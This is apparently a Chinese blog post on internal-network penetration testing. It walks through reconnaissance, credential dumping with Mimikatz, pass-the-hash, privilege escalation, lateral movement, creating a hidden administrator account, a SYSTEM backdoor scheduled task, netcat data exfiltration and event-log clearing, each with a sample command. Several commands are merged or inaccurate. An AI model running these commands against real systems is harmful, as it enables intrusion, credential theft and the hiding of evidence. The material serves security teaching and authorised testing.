常见的内网渗透思路及方法(包含示例)

内网渗透是指在企业或组织的内部网络中进行安全测试,以发现和利用网络中的安全漏洞。

以下是一些常见的内网渗透思路和方法,包含具体示例:

1. 信息收集

1.1 网络扫描
  • 目的:识别内网中的活跃主机和开放端口。

  • 工具:Nmap、Masscan

    示例

    • 使用Nmap进行Ping扫描,识别活跃主机:

      复制代码
      nmap -sP 192.168.1.0/24
    • 使用Nmap进行端口扫描和服务版本探测:

      复制代码
      nmap -sV 192.168.1.100
1.2 服务枚举
  • 目的:识别具体服务及其版本,以便寻找潜在漏洞。

  • 工具:Nmap、Netcat、Telnet

    示例

    • 使用Nmap进行详细的服务版本探测:

      复制代码
      nmap -sV -p 80,443,445 192.168.1.100
1.3 DNS枚举
  • 目的:通过DNS枚举了解内部域名和子域名结构。

  • 工具:dnsenum、Fierce、dnsrecon

    示例

    • 使用dnsenum进行DNS枚举:

      复制代码
      dnsenum --enum example.local

2. 主机发现和漏洞利用

2.1 漏洞扫描
  • 目的:识别主机上的已知漏洞。

  • 工具:Nessus、OpenVAS、Qualys

    示例

    • 使用Nessus进行漏洞扫描:

      复制代码
      nessus -q -x example_scan.xml 192.168.1.100
2.2 利用已知漏洞
  • 目的:利用已知漏洞获取目标主机的控制权。

  • 工具:Metasploit、Exploit-db

    示例

    • 使用Metasploit利用MS17-010漏洞(永恒之蓝)

3. 凭证收集和利用

3.1 SMB枚举
  • 目的:通过SMB协议枚举共享资源和用户信息。

  • 工具:Enum4linux、smbclient

    示例

    • 使用Enum4linux枚举共享和用户信息:

      复制代码
      enum4linux -a 192.168.1.100
3.2 密码抓取
  • 目的:从内存中抓取明文凭证或哈希。

  • 工具:Mimikatz、ProcDump

    示例

    • 使用Mimikatz抓取明文密码:

      复制代码
      privilege::debug sekurlsa::logonpasswords
3.3 Pass-the-Hash攻击
  • 目的:利用抓取的哈希进行Windows身份验证。

  • 工具:Impacket、pth-winexe

    示例

    • 使用Impacket执行Pass-the-Hash攻击:

      复制代码
      wmiexec.py -hashes <NTLM_HASH> [email protected]

4. 权限提升

4.1 本地提权漏洞利用
  • 目的:利用本地漏洞提升权限。

  • 工具:Metasploit、Exploit-db

    示例

    • 利用PrintNightmare漏洞提权:

      复制代码
      use exploit/windows/local/printnightmare set SESSION 1 exploit
4.2 权限提升脚本
  • 目的:自动扫描和发现潜在的提权点。

  • 工具:WinPEAS、LinPEAS

    示例

    • 运行WinPEAS脚本:

      复制代码
      winpeas.exe > output.txt

5. 横向移动

5.1 使用RDP、WMI和WinRM
  • 目的:通过这些协议连接到其他主机。

  • 工具:CrackMapExec、Impacket

    示例

    • 使用CrackMapExec进行横向移动:

      复制代码
      crackmapexec smb 192.168.1.0/24 -u administrator -p password
5.2 SSH横向移动
  • 目的:利用现有的SSH凭证连接到其他Linux主机。

  • 工具:SSH、Paramiko

    示例

6. 持久化

6.1 创建新用户
  • 目的:在目标系统中创建具有管理员权限的新用户。

  • 工具:Windows命令、Linux命令

    示例

    • 在Windows中创建新用户:

      复制代码
      net user pentest Passw0rd! /add net localgroup administrators pentest /add
6.2 计划任务和服务
  • 目的:利用计划任务或服务来保持持久化。

  • 工具:Windows Task Scheduler、cron

    示例

    • 在Windows中创建计划任务:

      复制代码
      schtasks /create /tn "Persistence" /tr "C:\backdoor.exe" /sc onlogon /ru SYSTEM

7. 数据收集和提取

7.1 文件搜集
  • 目的:搜集敏感文件和信息,如密码文件、配置文件等。

  • 工具:PowerShell、find、grep

    示例

    • 使用PowerShell搜索含有密码的文件:

      复制代码
      Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password"
7.2 数据提取
  • 目的:通过各种通道将数据提取到外部。

  • 工具:Netcat、FTP、DNS隧道

    示例

    • 使用Netcat传输数据:

      复制代码
      nc -l -p 4444 > data.txt nc 192.168.1.100 4444 < data.txt

8. 痕迹清理

日志清理
  • 目的:删除或篡改日志文件以隐藏入侵痕迹。

  • 工具:PowerShell、Wevtutil、Clear-EventLog

    示例

    • 使用PowerShell清理Windows事件日志:

      复制代码
      wevtutil cl System wevtutil cl Security

个人记录,也希望能够帮到你哦~

相关推荐
狐579 分钟前
2025-06-02-IP 地址规划及案例分析
网络·网络协议·tcp/ip
黎茗Dawn37 分钟前
5.子网划分及分片相关计算
网络·智能路由器
恰薯条的屑海鸥1 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十四期-XXE模块)
网络·学习·安全·web安全·渗透测试
科技小E1 小时前
口罩佩戴检测算法AI智能分析网关V4工厂/工业等多场景守护公共卫生安全
网络·人工智能
御承扬1 小时前
从零开始开发纯血鸿蒙应用之网络检测
网络·华为·harmonyos
DevSecOps选型指南10 小时前
2025软件供应链安全最佳实践︱证券DevSecOps下供应链与开源治理实践
网络·安全·web安全·开源·代码审计·软件供应链安全
国科安芯11 小时前
抗辐照MCU在卫星载荷电机控制器中的实践探索
网络·嵌入式硬件·硬件工程·智能硬件·空间计算
EasyDSS12 小时前
国标GB28181设备管理软件EasyGBS远程视频监控方案助力高效安全运营
网络·人工智能
玩转4G物联网12 小时前
零基础玩转物联网-串口转以太网模块如何快速实现与TCP服务器通信
服务器·网络·物联网·网络协议·tcp/ip·http·fs100p
派阿喵搞电子12 小时前
Ubuntu下有关UDP网络通信的指令
linux·服务器·网络